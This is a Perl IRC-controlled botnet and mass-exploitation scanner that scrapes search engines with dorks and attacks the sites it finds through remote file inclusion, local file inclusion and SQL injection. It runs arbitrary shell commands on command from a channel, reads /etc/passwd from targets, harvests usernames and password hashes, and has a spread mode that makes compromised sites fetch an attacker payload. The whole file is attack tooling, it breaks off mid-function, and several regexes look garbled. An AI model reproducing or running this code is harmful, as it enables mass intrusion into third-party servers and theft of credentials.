#!/usr/bin/perl
# Coded by Osirys
# osirys[at]live[dot]it
# v5 Scanner - Ex private - now public :-)


use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;

#######################################################
## CONFIGURATION                                     //
#######################################################


my $id    = "";               #Your RFI Response
my $shell = "";                                  #Shell printed on the Vulnerable Site
my $ircd  = "";                                                  #Irc-Server
my $port  = "6667";                                                           #Irc-Server Port
my $chan1 = "#fuck-Police";                                                          #Chan for Scan
my $chan2 = "#Vuln";                                                          #Results will be printed here too
my $nick  = "v5-Mother";                                                      #Nick
my $sqlpidpr0c = 1; # This is the number of sites that the bot will test in the same time. For an accurated scann, it's reccomended to set a low number(1) 
# (Expecially if you are scanning on 0day bugs), so a lot of presunted vulnerable sites. Unless you will see the bot exiting by an excess flood!
# Instead, if you are scaning on old bugs, so not many results, you can put a higher number, so more speed.
my $rfipidpr0c = 50;

### USEFULL OPTIONS ( 0 => OFF  ;  1 => ON )

my $spread = "";

my $spreadACT   = 0; #0 ->disabled, 1 ->enabled
my $securityACT = 0; #0 ->disabled, 1 ->enabled

my $killpwd   = "lol"; #Password to Kill the Bot
my $chidpwd   = "lol"; #Password to change the RFI Response
my $cmdpwd    = "lol"; #Password to execute commands on the server
my $secpwd    = "lol"; #Passowrd to enable/disable the Security Mode
my $spreadpwd = "lol"; #Passowrd to enable/disable the Spread Mode

my $badspreadpwd != $spreadpwd;
my $badkillpwd   != $killpwd;
my $badidpwd     != $chidpwd;
my $badcmdpwd    != $cmdpwd;


#######################################################
## END OF CONFIGURATION                              //
#######################################################

open( $f1le, ">", "rm.txt" );
print $f1le "\#!/usr/bin/perl\n";
print $f1le "exec(\"rm -rf \*siti\*\")\;\n";
close $f1le;


@help = (
"15,1[!] 9,1!response 15,1 > 11,1Test if the RFI Response is working ",
"15,1[!] 9,1!chid  15,1 > 11,1Change the RFI-Response ",
"15,1[!] 9,1!killme 15,1 > 11,1KILL The Bot ",
"15,1[!] 9,1!new rfi bugs 15,1 > 11,1Get the last 10 RFI bugs ",
"15,1[!] 9,1!new lfi bugs 15,1 > 11,1Get the last 10 LFI bugs ",
"15,1[!] 9,1!new sql-inj bugs 15,1 > 11,1Get the last 10 SQL Injection bugs ",
"15,1[!] 9,1!rfi   -p  15,1 > 11,1Start the RFI Scanner ",
"15,1[!] 9,1!lfi   15,1 > 11,1Start the LFI Scanner ",
"15,1[!] 9,1!sql   -p  15,1 > 11,1Start the SQL Injection Scanner ",
"15,1[!] 9,1!cmd  15,1 > 11,1Gives command on the Bot's shell. Ex: (!cmd id) (!cmd uname -a) ",
"15,1[!] 9,1/msg $nick !Sec ON/OFF -p  15,1 > 11,1To enable or disable Security Mode ",
"15,1[!] 9,1!Spread ON/OFF 15,1 > 11,1To enable or disable Spread Mode ",
"15,1[!] 9,1!info 15,1 > 11,1Get infos about the Bot "
);

my $sys = `uname -a`;
my $up = `uptime`;

if ($spreadACT == 0) {
    $t5 = "OFF";
}
elsif ($spreadACT == 1) {
    $t5 = "ON";
}

if ($securityACT == 0) {
    $y5 = "OFF";
}
elsif ($securityACT == 1) {
    $y5 = "ON";
}


$k=0;

if ( fork() == 0 ) {
    &irc( $ircd, $port, $chan1, $chan2, $nick );
}
else {
    exit;
}

sub irc () {
    my ( $ircd, $port, $chan1, $chan2, $nick ) = @_;
    $c0n = IO::Socket::INET->new(
        PeerAddr => "$ircd",
        PeerPort => "$port",
        Proto    => "tcp"
    ) or die "Can not connect on server!\n";
    $c0n->autoflush(1);
    print $c0n "NICK $nick\n";
    print $c0n "USER soldier 8 *  : Osirys\n";
    print $c0n "JOIN $chan1\n";

    while ( $line = <$c0n> ) {

        @info = (
         "9,1[i] 15,1Release : 11,1v5-Private IrcBot ",
         "9,1[i] 15,1Author  : 11,1Osirys ",
         "9,1[i] 15,1Contact : 11,1osirys\@live.it ",
         "9,1[i] 15,1Uname -a: 11,1$sys ",
         "9,1[i] 15,1Uptime  : 11,1$up ",
         "9,1[i] 15,1Spread Mode: 11,1$t5 ",
         "9,1[i] 15,1Security Mode: 11,1$y5 "
        );
        

        $k++;

        my $sys = `uname -a`;
        my $up = `uptime`;

        if ($spreadACT == 0) {
            $t5 = "OFF";
        }
        elsif ($spreadACT == 1) {
            $t5 = "ON";
        }

        if ($securityACT == 0) {
            $y5 = "OFF";
        }
        elsif ($securityACT == 1) {
            $y5 = "ON";
        }

        if ( $line =~ /^PING \:(.*)/ ) {
            print $c0n "PONG :$1";
        }



        if ( $line =~ /001/ ) {
            print $c0n "JOIN $chan1\n";
            #writ1("4,1_/9,1 V5-Private 11,1ON 7,1_>");
            #writ1("4,1# Coded by Osirys ");
        }



        if (( $line =~ /PRIVMSG $chan1 :!help/ ) && ($securityACT == 0)) {
            @help;
            foreach my $e(@help){
                writ1("$e");
            }
        }
        elsif (( $line =~ /PRIVMSG $chan1 :!help/ ) && ($securityACT == 1)) {
            @help;
            $help[1] = "15,1[!] 9,1/msg $nick !chid  -p  15,1 > 11,1Change the RFI-Response ";
            $help[2] = "15,1[!] 9,1/msg $nick !killme -p  15,1 > 11,1KILL The Bot ";
            $help[9] = "15,1[!] 9,1/msg $nick !cmd   15,1 > 11,1Gives command on the Bot's shell. Ex: (!cmd id) ";
            $help[11] = "15,1[!] 9,1/msg $nick !Spread ON/OFF -p  15,1 > 11,1To enable or disable Spread Mode ";
            foreach my $e(@help){
                writ1("$e");
            }
        }



        if ( $line =~ /PRIVMSG $chan1 :!info/) {
            @info;
            foreach my $n(@info) {
                writ1("$n");
            }
        }

        
        if ( $line =~ /PRIVMSG $chan1 :!new rfi bugs/ ) {
            my @re = query("nostrosito"); #Put here a link in .txt with a list of bugs
            writ1("15,1[+] 9,1Last 10 RFI bugs: ");
            foreach my $n (@re) {
                writ1(" 9,1$n ");
            }
        }



        if ( $line =~ /PRIVMSG $chan1 :!new lfi bugs/ ) {
            my @re = query("nostrosito");
            writ1("15,1[+] 16,1Last 10 LFI bugs: ");
            foreach my $n (@re) {
                writ1(" 16,1$n ");
            }
        }



        if ( $line =~ /PRIVMSG $chan1 :!new sql-inj bugs/ ) {
            my @re = query("nostrosito");
            writ1("15,1[+] 7,1Last 10 SQL Inj bugs: ");
            foreach my $n (@re) {
                writ1(" 7,1$n ");
            }
        }



        if ( $line =~ /PRIVMSG $chan1 :!response/ ) {
            my $re = query($id);
            if ( $re =~ /Osirys/ ) {
                writ1("15,1[+] 12,9RFI Response is working ! ");
            }
            else {
                writ1("15,1[-] 12,4RFI Response is NOT working ! ");
            }
        }



        if (($line=~ /PRIVMSG $nick :!chid\s+(.*) -p $chidpwd/) && ($securityACT == 1)) {
            $newid = $1;
            $id = $newid;
            writ1("15,1[+] 9,1RFI Response changed ! ");
            writ1("15,1[+] 9,1New RFI Response: $id ");
        }
        elsif (($line=~ /PRIVMSG $nick :!chid\s+(.*) -p $badidpwd/) && ($securityACT == 1)) {
            writ1("15,1[-] 9,1Error Changing the RFI-Response (bad Password)! ");
        }
        elsif (($line=~ /PRIVMSG $chan1 :!chid\s+(.*)/) && ($securityACT == 0)) {
            $newid = $1;
            $id = $newid;
            writ1("15,1[+] 9,1RFI Response changed ! ");
            writ1("15,1[+] 9,1New RFI Response: $id ");
        }



        if (($line=~ /PRIVMSG $nick :!killme -p $killpwd/) && ($securityACT == 1)) {
            writ1("15,1[!] 12,4Bye Bye ! ");
            print $c0n "QUIT";
            exec("perl rm.txt && pkill perl \n"); 
        }
        elsif (($line=~ /PRIVMSG $nick :!killme -p $badkillpwd/) && ($securityACT == 1)) {
            writ1("15,1[-] 12,4Error Killing the Bot (Null or bad Password) ! ");
        }
        elsif (($line=~ /PRIVMSG $chan1 :!killme/) && ($securityACT == 0)) {
               writ1("15,1[!] 12,4Bye Bye ! ");
               print $c0n "QUIT";
               exec("perl rm.txt && pkill perl \n"); 
        }



        if (($line=~ /PRIVMSG $nick :!cmd\s+(.*) -p $cmdpwd/) && ($securityACT == 1) && (fork() == 0)) {
            my $cmd = $1;
            if ($cmd =~ /cd (.*)/) {
                chdir("$1") || priv8("Can't change dir"); 
                return;
            }
            my @output = `$1`;
            my $count = 0;
            foreach my $out(@output) {
                #$count++;
                #if ($count == 10) {
                    #sleep(3);
                    #$count = 0;
                #}
                priv8("15,1[+] 7,1$out ");
           }
           exit;
        }
        elsif  (($line=~ /PRIVMSG $nick :!cmd\s+(.*) -p $badcmdpwd/) && ($securityACT == 1) && (fork() == 0)) {
            priv8("15,1[-] 12,4Error using the shell (Null or bad Password) ! ");
        }
        elsif  (($line=~ /PRIVMSG $chan1 :!cmd\s+(.*)/) && ($securityACT == 0) && (fork() == 0)) {
            my $cmd = $1;
            if ($cmd =~ /cd (.*)/) {
                $dir = $1;
                chomp($dir);
                chdir ($dir) || writ1("Can't change dir"); 
            }
            my @output = `$1`;
            my $count = 0;
            foreach my $out(@output) {
                #$count++;
                #if ($count == 10) {
                    #sleep(3);
                    #$count = 0;
                #}
                writ1("15,1[+] 7,1$out ");
           }
           exit;
        }



        if ($line=~ /PRIVMSG $nick :!Sec\s+(.*) -p $secpwd/) {
            $s = $1;
            if ($s =~ /ON/) {
                $securityACT = 1;
                writ1("15,1[+] 12,9Security Mode Activated !!");
            }
            elsif ($s =~ /OFF/) {
                $securityACT = 0;
                writ1("15,1[+] 12,4Security Mode Disabled !!");
            }
        }



        if (($line=~ /PRIVMSG $nick :!Spread\s+(.*) -p $spreadpwd/) && ($securityACT == 1)) {
            $t = $1;
            if ($t =~ /ON/) {
                $spreadACT = 1;
                writ1("15,1[+] 12,9Spread Mode Activated !!");
            }
            elsif ($t =~ /OFF/) {
                $spreadACT = 0;
                writ1("15,1[+] 12,4Spread Mode Disabled !!");
            }
        }
        elsif (($line=~ /PRIVMSG $nick :!Spread\s+(.*) -p $badspreadpwd/) && ($securityACT == 1)) {
            writ1("15,1[-] 12,4Error changing the Spread Mode (Null or bad Password) ! ");
        }
        elsif (($line=~ /PRIVMSG $chan1 :!Spread\s+(.*)/) && ($securityACT == 0)) {
            $t = $1;
            if ($t =~ /ON/) {
                $spreadACT = 1;
                writ1("15,1[+] 12,9Spread Mode Activated !!");
            }
            elsif ($t =~ /OFF/) {
                $spreadACT = 0;
                writ1("15,1[+] 12,4Spread Mode Disabled !!");
            }
        }



        if (($line =~ /PRIVMSG $chan1 :!rfi\s+(.*?)\s+(.*)\s+-p(.+[0-9])/) && (fork() == 0)) {
            my ($bug, $dork, $rfipid) = ($1, $2, $3);
            writ1("4,1[*] 9,1RFI Scan started -> $rfipid sites/process ");
            writ1("9,1[+] Bug: $bug");
            $d0rk = clean($dork);
            writ1("4,1[+] Dork: $d0rk");
            my $a    = $k . "a";
            my $n4me = $a . "siti.txt";
            find($d0rk, $n4me);
            rfi($bug, $n4me, $d0rk, $rfipid);
            writ1("4,1[-] RFI Scan finished 9,1 >15,1 $d0rk");
            writ1("11,1[?] # Coded by Osirys ");
            exit(0);
        }





        if (($line =~ /PRIVMSG $chan1 :!lfi\s+(.*?)\s+(.*)/) && (fork() == 0)) {
            my ($bug, $dork) = ($1, $2);
            writ1("4,1[*] 7,1LFI Scan started ");
            writ1("9,1[+] Bug: $bug");
            $d0rk = clean($dork);
            writ1("4,1[+] Dork: $d0rk");
            my $b    = $k . "b";
            my $n4me = $b . "siti.txt";
            find($d0rk, $n4me);
            lfi($bug, $n4me, $d0rk);
            writ1("4,1[-] LFI Scan finished 9,1 >15,1 $d0rk");
            writ1("11,1[?] # Coded by Osirys ");
            exit(0);
        }



        if (($line =~ /PRIVMSG $chan1 :!sql\s+(.*?)\s+(.*)\s+-p(.+[0-9])/) && (fork() == 0)) {
            my ($bug, $dork, $sqlpid) = ($1, $2, $3);
            writ1("4,1[*] 15,1SQL Inj Scan started -> $sqlpid sites/process ");
            writ1("9,1[+] Bug: $bug");
            $d0rk = clean($dork);
            writ1("4,1[+] Dork: $d0rk");
            my $c    = $k . "c";
            my $n4me = $c . "siti.txt";
            find($d0rk, $n4me);
            sql($bug, $n4me, $d0rk, $sqlpid);
            writ1("4,1[-] SQL Scan finished 9,1 >15,1 $d0rk");
            writ1("11,1[?] # Coded by Osirys ");
            exit(0);
        }
    }
}




sub find () {
    my $dork = $_[0];
    my $name = $_[1];
    my @engine;
    $engine[0] = fork();
    if ( $engine[0] == 0 ) {
        my @glist = google( $dork, $name );
        writ1("9,1[~] 7,1>GOOGLE : 11,1 ". scalar(@glist). " 9,1 > 15,1 $dork" );
        exit;
    }
    $engine[1] = fork();
    if ( $engine[1] == 0 ) {
        my @all = alltheweb( $dork, $name );
        writ1("9,1[~] 7,1>ALLTHEWEB : 11,1 ". scalar(@all). " 9,1 > 15,1 $dork" );
        exit;
   }
    $engine[2] = fork();
    if ( $engine[2] == 0 ) {
        my @alt = altavista( $dork, $name );
        writ1("9,1[~] 7,1>ALTAVISTA : 11,1 ". scalar(@alt). " 9,1 > 15,1 $dork" );
        exit;
    }
    $engine[3] = fork();
    if ( $engine[3] == 0 ) {
        my @emsn = msn( $dork, $name );
        writ1("9,1[~] 7,1>MSN : 11,1 ". scalar(@emsn). " 9,1 > 15,1 $dork" );
        exit;
    }
    $engine[4] = fork();
    if ( $engine[4] == 0 ) {
        my @ysites = yahoo( $dork, $name );
        writ1("9,1[~] 7,1>YAHOO : 11,1 ". scalar(@ysites). " 9,1 > 15,1 $dork" );
        exit;
    }
    $engine[5] = fork();
    if ( $engine[5] == 0 ) {
        my @asksites = ask( $dork, $name );
        writ1("9,1[~] 7,1>ASK : 11,1 ". scalar(@asksites). " 9,1 > 15,1 $dork" );
        exit;
    }
    $engine[6] = fork();
    if ($engine[6] == 0) {
        my @aolsites = aol($dork,$name);
        writ1("9,1[~] 7,1>AOL : 11,1 ". scalar(@aolsites). " 9,1 > 15,1 $dork" );
        exit;
    }
    $engine[7] = fork();
    if ( $engine[7] == 0 ) {
        my @dmozsites = dmoz( $dork, $name );
        writ1("9,1[~] 7,1>DMOZ : 11,1 ". scalar(@dmozsites). " 9,1 > 15,1 $dork" );
        exit;
    }
    $engine[8] = fork();
    if ($engine[8] == 0) {
        my @webdesites = webde($dork,$name);
        writ1("9,1[~] 7,1>WEB.DE : 11,1 ". scalar(@webdesites). " 9,1 > 15,1 $dork" );
        exit;
    }
    $engine[9] = fork();
    if ($engine[9] == 0) {
        my @einetsites = einet($dork,$name);
        writ1("9,1[~] 7,1>eiNET.net : 11,1 ".scalar(@einetsites)." 9,1 > 15,1 $dork" );
        exit;
    }

    foreach my $e(@engine){
        waitpid($e,0);
    }

}

sub rfi () {
    my $bug  = $_[0];
    my $name = $_[1];
    my $dork = $_[2];
    my $rfipid = $_[3]; 
    my @forks;
    my $num = 0;
    open( filez, '<', $name );
    while ( my $a =  ) {
        $a =~ s/\n//g;
        push( @tot, $a );
    }
    close filez;
    remove($name);
    my @toexploit = unici(@tot);
    writ1("9,1[*] 4,1>EXPLOITABLES:   11,1 ". scalar(@toexploit). "   15,1 $dork" );
    sleep(1);
    writ1("4,1[+] 9,1ExPLoItIng STARTED !! " );
    foreach my $site (@toexploit) {
        my $test  = "http://" . $site . $bug . $id . "??";
        print "$test\n";
        $count++;
        if ( $count % $rfipid == 0 ) {
	    foreach my $f(@forks){
                waitpid($f,0);
            }
	    $num = 0;
        }
        if($count %100 == 0){
            writ1("9,1[%] 15,1 _/ 11,1Exploiting   4,1 ". $count. " 11,1 / 4,1 ". scalar(@toexploit). " ");
        }
        $forks[$num]=fork();
        if($forks[$num] == 0){
            my $test  = "http://" . $site . $bug . $id . "??";
            my $print = "http://" . $site . $bug . $shell . "?";
            my $re    = query($test);
            if ( $re =~ /Osirys/ && $re =~ /uid=/ ) {
                os($test);
                writ1("12(12,9safe: OFF12) (12,9os: $os12) 12,9$print ");
                writ1("12(12,9uname -a12) 12 $un");
                writ1("12(12,9uid / gid12) 12 $id1");
                writ1("12(12,9hdd space12) 12 free: ($free) used: ($used) tot: ($all) ");
                writ2("");
                writ2("12(12,9safe: OFF12) (12,9os: $os12) 12,9$print ");
                writ2("12(12,9uname -a12) 12 $un 12(12,9uid12)12 $id1");
                if ( $spreadACT == 1 ) {
                    writ1("15,1[+] 9,1Trying to spread .. ");
                    sleep(2);
                    my $test2 = "http://" . $site . $bug . $spread . "?";
                    my $reqz  = query($test2);
                }
            }
            elsif ( $re =~ /Osirys/ ) {
                os($test);
                writ1("12(12,4safe: ON12) (12,4os: $os12) 12,4$print ");
                writ1("12(12,4uname -a12) 12 $un");
                writ1("12(12,4uid / gid12) 12 $id1");
                writ1("12(12,4hdd space12) 12 free: ($free) used: ($used) tot: ($all) ");
                writ2("");
                writ2("12(12,4safe: ON12) (12,4os: $os12) 12,4$print ");
                if ( $spreadACT == 1 ) {
                    writ1("15,1[+] 9,1Trying to spread .. ");
                    sleep(2);
                    my $test2 = "http://" . $site . $bug . $spread . "?";
                    my $reqz  = query($test2);
                }
            }
            exit(0);
        }
        $num++;
    }
    foreach my $f(@forks){
	waitpid($f,0);
    }
}

sub lfi () {
    my $bug  = $_[0];
    my $name = $_[1];
    my $dork = $_[2];
    my @forks;
    my $num = 0;
    open( filez, '<', $name );
    while ( my $a =  ) {
        $a =~ s/\n//g;
        push( @tot, $a );
    }
    close filez;
    remove($name);
    my @toexploit = unici(@tot);
    writ1("9,1[*] 4,1>EXPLOITABLES:   11,1 ". scalar(@toexploit). "   15,1 $dork" );
    writ1("4,1[+] 9,1ExPLoItIng STARTED !! " );
    foreach my $site (@toexploit) {
        $count++;
        if ( $count % 100 == 0 ) {
	    foreach my $f(@forks){
                waitpid($f,0);
            }
	    $num = 0;
        }
        if ( $count % 300 == 0 ) {
            writ1("9,1[%] 15,1 _/ 11,1Exploiting   4,1 ". $count. " 11,1 / 4,1 ". scalar(@toexploit). " ");
        }
        $forks[$num]=fork();
        if($forks[$num] == 0){
            my $inj   = "../../../../../../../../../../../../../etc/passwd%00";
            my $test  = "http://" . $site . $bug . $inj;
            my $print = "http://" . $site . $bug . $inj;
            my $re    = query($test);
            if ( $re =~ /root:x:/ ) {
                writ1("7(7,1LFI7) 9,1$print");
                writ2("7(7,1LFI7) 9,1$print");
            }
            exit(0);
        }
        $num++;
    }
    foreach my $f(@forks){
	waitpid($f,0);
    }
}

sub sql () {
    my $bug  = $_[0];
    my $name = $_[1];
    my $dork = $_[2]; 
    my $sqlpid = $_[3]; 
    my @forks;
    my $num = 0;
    open( filez, '<', $name );
    while ( my $a =  ) {
        $a =~ s/\n//g;
        push( @tot, $a );
    }
    close filez;
    remove($name);
    my @toexploit = unici(@tot);
    writ1("9,1[*] 4,1>EXPLOITABLES:   11,1 ". scalar(@toexploit). "   15,1 $dork" );
    writ1("4,1[+] 9,1ExPLoItIng STARTED !! " );
    foreach my $site (@toexploit) {
        my $test  = "http://" . $site . $bug;
        print "$test\n";
        $count++;
        if($count %$sqlpid == 0){
	    foreach my $f(@forks){
                waitpid($f,0);
            }
	    $num = 0;
	}
        if($count %100 == 0){
            writ1("9,1[%] 15,1 _/ 11,1Exploiting   4,1 ". $count. " 11,1 / 4,1 ". scalar(@toexploit). " ");
        }
        $forks[$num]=fork();
        if($forks[$num] == 0){
            my $test  = "http://" . $site . $bug;
            my $print = "http://" . $site . $bug;
            my $re    = query($test);
            if ( $re =~ /(.*):(.*)([0-9,a-f]{32})/ ) { 
                my ($user,$hash) = ($2,$3);
                $user =~ s/\<(.*)\>//g;
                if ($user !~ /(\/|\<|\>|\")/) {
                    if ($sqlpid == $sqlpidpr0c) {
                        writ1("9(9,12SQL INJ9) 15,12$print");
                        writ1("9(9,12User9) 15,12$user");
                        writ1("9(9,12Hash9) 15,12$hash");
                        writ2("9(9,12SQL INJ9) 15,12$print");
                    }
                    elsif  ($sqlpid > $sqlpidpr0c) { 
                        writ1("9(9,12SQL INJ9) 15,12$print");
                    }
                }
            }
            exit(0);
        }
        $num++;
    }
    foreach my $f(@forks){
	waitpid($f,0);
    }
}

sub google () {
    my @gsites;
    my $key = $_[0];
    my $name = $_[1];
    my $gtest = ("www.google.com/search?q=hi&hl=en&start=10&sa=N");
    my $ret = query1($gtest);
    if ($ret =~ /2008 Google/) {
        @gsites = gfind($key,$name);
    }
    else {
        writ1("4,1[!] 4,1Banned by Google Engine, trying to bypass it !");
        @gsites = gbypass($key,$name);
    }
    return @gsites;
}

sub gfind () {
    my @list;
    my $key = $_[0];
    my $name= $_[1];
    for ($p = 0;$p <= 900; $p += 100) {
        my $g0gle = ("www.google.it/search?q=".key($key)."&num=100&hl=it&as_qdr=all&start=".$p."&sa=N");
        my $gr = query1($g0gle);
        while ($gr =~ m/\"]*)\//g) {
            my $k = $1;
            if ($k !~ /google/) {
                my @grep = links($k);
                open( $filez, ">>", $name );
                foreach my $k (@grep) {
                    print $filez "$k\n";
                }
                close $filez;
                push(@list, @grep);
            }
        }
    }
    return @list;
}

sub gbypass () { # Euroseek uses the same search type of google
    my @lst;
    my $key  = $_[0];
    my $name = $_[1];
    for ( $p = 0 ; $p <= 1000 ; $p += 10 ) {
        my $gp = ("http://euroseek.com/system/search.cgi?language=en&mode=internet&start=".$p."&string=".key($key));
        my $re = query($gp);
        while ($re =~ m//g ) {
            my $k = $1;
            my @grep = links($k);
            open( $filez, ">>", $name );
            foreach my $k (@grep) {
                print $filez "$k\n";
            }
            close $filez;
            push( @lst, @grep );
        }
    }
    return @lst;
}

sub alltheweb() {
    my @lst;
    my $key  = $_[0];
    my $name = $_[1];
    for ( $i = 0 ; $i <= 1000 ; $i += 100 ) {
        my $All = ( "http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=". key($key) . "&o=". $i );
        my $re = query($All);
        while ( $re =~ m/http:\/\/(.+?)\<\/span>/g ) {
            my $k = $1;
            $k =~ s/ //g;
            my @grep = links($k);
            open( $filez, ">>", $name );
            foreach my $k (@grep) {
                print $filez "$k\n";
            }
            close $filez;
            push( @lst, @grep );
        }
    }
    return @lst;
}

sub altavista() {
    my @lst;
    my $key  = $_[0];
    my $name = $_[1];
    for ($b = 1;$b <= 1000;$b += 10) {
        my $Alt = ( "http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=". key($key) . "&stq=". $b );
        my $re = query($Alt);
        while ( $re =~ m/(.+?)\//g ) {
            if ( $1 !~ /altavista/ ) {
                my $k = $1;
                $k =~ s/>", $name );
                foreach my $k (@grep) {
                    print $filez "$k\n";
                }
                close $filez;
                push( @lst, @grep );
            }
        }
        if ( $re =~ /target=\"_self\">Succ/ ) { }
        else {
            return @lst;
        }
    }
    return @lst;
}

sub msn() {
    my @lst;
    my $key  = $_[0];
    my $name = $_[1];
    for ( $b = 1 ; $b <= 1000 ; $b += 10 ) {
        my $Msn = ( "http://search.live.com/results.aspx?q=". key($key). "&first=". $b. "&FORM=PERE" );
        my $re = query($Msn);
        while ( $re =~ m/\"]*)\//g ) {
            if ( $1 !~ /msn|live/ ) {
                my $k    = $1;
                my @grep = links($k);
                open( $filez, ">>", $name );
                foreach my $k (@grep) {
                    print $filez "$k\n";
                }
                close $filez;
                push( @lst, @grep );
            }
        }
    }
    return @lst;
}

sub yahoo () {
    my @ysites;
    my $key = $_[0];
    my $name = $_[1];
    my $ytest = ("http://www.search.yahoo.com/search?p=hello&ei=UTF-8&fr=yfp-t-501&fp_ip=IT&pstart=1&b=1");
    my $ret = query($ytest);
    if ($ret =~ /We did not find results for/) {
        return @ysites;
    }
    elsif ($ret =~ /title=\"Yahoo! Search results for hello\"/) {
        @ysites = yfind($key,$name);
        return @ysites;
    }
    else {
        writ1("4,1[!] 4,1Banned by Yahoo Engine, trying to bypass it !");
        @ysites = ybypass($key,$name);
        return @ysites;
    }
}

sub yfind() {
    my @lst;
    my $key  = $_[0];
    my $name = $_[1];
        for ( $b = 1 ; $b <= 1000 ; $b += 10 ) {
            my $ylink = ( "http://search.yahoo.com/search?p=".key($key)."&ei=UTF-8&fr=yfp-t-501&fp_ip=IT&pstart=1&b=".$b);
            my $re = query($ylink);
            while ( $re =~ m//g ) {
                my $k = $1;
                if ($k !~ /yahoo|/) {
                    my @grep = links($k);
                    open( $filez, ">>", $name );
                    foreach my $k (@grep) {
                        print $filez "$k\n";
                    }
                    close $filez;
                    push( @lst, @grep );
                }
            }
        }
    return @lst;
}  

sub ybypass () { # GoodSearch uses the same search type of Yahoo
    my @lst;
    my $key  = $_[0];
    my $name = $_[1];
    my $ybytest = ("http://www.goodsearch.com/Search.aspx?Keywords=".key($key)."&page=1&osmax=16");
    my $res = query($ybytest);
    if ($res =~ /Your search did not yield any results/){
        return @lst;
    }
    else {
        for $p(1..50){
            my $ybylink = ("http://www.goodsearch.com/Search.aspx?Keywords=".key($key)."&page=".$p."&osmax=16");
            my $rek = query($ybylink);
            while ($rek =~ m/href=\"(.+?)\">(.+?)<\/a>/g) {
                my $tsite = $2;
                if (($tsite =~ /\./) && ($tsite !~ /<|>| /)){
                    my @grep = links($tsite);
                    open( $filez, ">>", $name );
                    foreach my $tsite (@grep) {
                        print $filez "$tsite\n";
                    }
                    close $filez;
                    push( @lst, @grep );   
                }       
            }
        }
        return @lst;
    }
} 


sub ask () {
    my $key = $_[0]; 
    my $name = $_[1];
    my @lst;
    my $askt = ("http://it.ask.com/web?q=".key($key)."&qsrc=1&o=312&l=dir&dm=all");
    my $asktest = query($askt);
    if ($asktest =~ /non ha prodotto alcun risultato/) {
        return @lst;
    }
    else {
        for ($p=0;$p<=20;$p++){
            my $asklink = ("http://it.ask.com/web?q=".key($key)."&o=0&l=dir&qsrc=0&qid=612B74535B00F6CA7678625658F9B98C&dm=all&page=".$p);
            my $re = query($asklink);
            while($re =~ m/href=\"http:\/\/(.+?)\"/g){
                my $tsite = $1;
                if ($tsite !~ /ask|wikipedia/){
                    my @grep = links($tsite);
                    open( $filez, ">>", $name );
                    foreach my $tsite (@grep) {
                        print $filez "$tsite\n";
                    }
                    close $filez;
                    push( @lst, @grep );
                }
            }
        }
        return @lst;
    }
}

sub aol () {
    my $key = $_[0]; 
    my $name = $_[1];
    my @lst;
    my $aolt = ("http://search.aol.com/aol/search?invocationType=topsearchbox.search&query=".key($key));
    my $atest = query($aolt);
    if ($atest =~ /returned no results.<\/h3>/) {
        return @lst;
    }
    else {
        for ($p=1;$p<=100;$p++){
            my $aollink = ("http://search.aol.com/aol/search?query=".key($key)."&page=".$p."&nt=SG2&do=Search&invocationType=comsearch30&clickstreamid=3154480101243260576");
            my $re = query($aollink);
            while($re =~ m/

(.+?)\n-/g) { my $tsite = $1; my @grep = links($tsite); open( $filez, ">>", $name ); foreach my $tsite (@grep) { print $filez "$tsite\n"; } close $filez; push( @lst, @grep ); } } return @lst; } } sub dmoz () { my $key = $_[0]; my $name = $_[1]; my @lst; my $dmtest = ("http://search.dmoz.org/cgi-bin/search?search=".key($key)); my $dmq = query($dmtest); if ($dmq =~ /No Open Directory Project<\/a><\/b> results found/){ return @lst; } elsif ($dmq =~ /of (.+?)\)

/){ my $ftot = $1; if ($ftot <= 20) { $max = 1; } else { my $to = $ftot / 20; if ($to =~ /(.+).(.+?)/){ $uik = $1 * 20; $max = $uik +1; } elsif ($to =~ /[0-9]/) { my $to--; my $rej = $to * 20; $max = $rej +1; } } } for ($p=1;$p<=$max;$p += 20){ my $dmozlink = ("http://search.dmoz.org/cgi-bin/search?search=".key($key)."&utf8=1&locale=it_it&start=".$p); my $re = query($dmozlink); while($re =~ m/>", $name ); foreach my $tsite (@grep) { print $filez "$tsite\n"; } close $filez; push( @lst, @grep ); } } } return @lst; } sub webde () { my $key = $_[0]; my $name = $_[1]; my @lst; for $p(1..50){ my $webdelink = ("http://suche.web.de/search/web/?pageIndex=".$p."&su=".key($key)."&y=0&x=0&mc=suche@web@navigation@zahlen.suche@web"); my $re = query($webdelink); while($re =~ m/href=\"http:\/\/(.+?)\">/g) { my $tsite = $1; if ($tsite !~ /\/search\/web|web.de|\" class=\"neww\"/){ my @grep = links($tsite); open( $filez, ">>", $name ); foreach my $tsite (@grep) { print $filez "$tsite\n"; } close $filez; push( @lst, @grep ); } } } return @lst; } sub einet () { my $key = $_[0]; my $name = $_[1]; my @lst; my $einetest = ("http://www.einet.net/view/search.gst?p=1&k=".key($key)."&s=0&submit=Search"); my $einet3st = query($einetest); if ($einet3st =~ /Page 1 of\s+(.+?)<\/span>/){ my $totz = $1; for ($p=1;$p<=$totz;$p++){ my $einetlink = ("http://www.einet.net/view/search.gst?p=".$p."&k=".key($key)."&s=0&submit=Search"); my $re = query($einetlink); while($re =~ m/\s+(.+?)<\/span>/g) { my $tsite = $1; my @grep = links($tsite); open( $filez, ">>", $name ); foreach my $tsite (@grep) { print $filez "$tsite\n"; } close $filez; push( @lst, @grep ); } } } return @lst; } sub remove() { my $file = $_[0]; system("rm $file"); } sub clean () { $dork = $_[0]; if ( $dork =~ /inurl:|allinurl:|intext:|allintext:|intitle:|allintitle:/ ) { writ1("15,1[+] 4,1Cleaning Dork from Google Search Keys !"); $dork =~ s/^inurl://g; $dork =~ s/^allinurl://g; $dork =~ s/^intext://g; $dork =~ s/^allintext://g; $dork =~ s/^intitle://g; $dork =~ s/^allintitle://g; } return $dork; } sub key() { my $dork = $_[0]; $dork =~ s/ /\+/g; $dork =~ s/:/\%3A/g; $dork =~ s/\//\%2F/g; $dork =~ s/&/\%26/g; $dork =~ s/\"/\%22/g; $dork =~ s/,/\%2C/g; $dork =~ s/\\/\%5C/g; return $dork; } sub links() { my @l; my $link = $_[0]; my $host = $_[0]; my $hdir = $_[0]; $hdir =~ s/(.*)\/[^\/]*$/\1/; $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; $host .= "/"; $link .= "/"; $hdir .= "/"; $host =~ s/\/\//\//g; $hdir =~ s/\/\//\//g; $link =~ s/\/\//\//g; push( @l, $link, 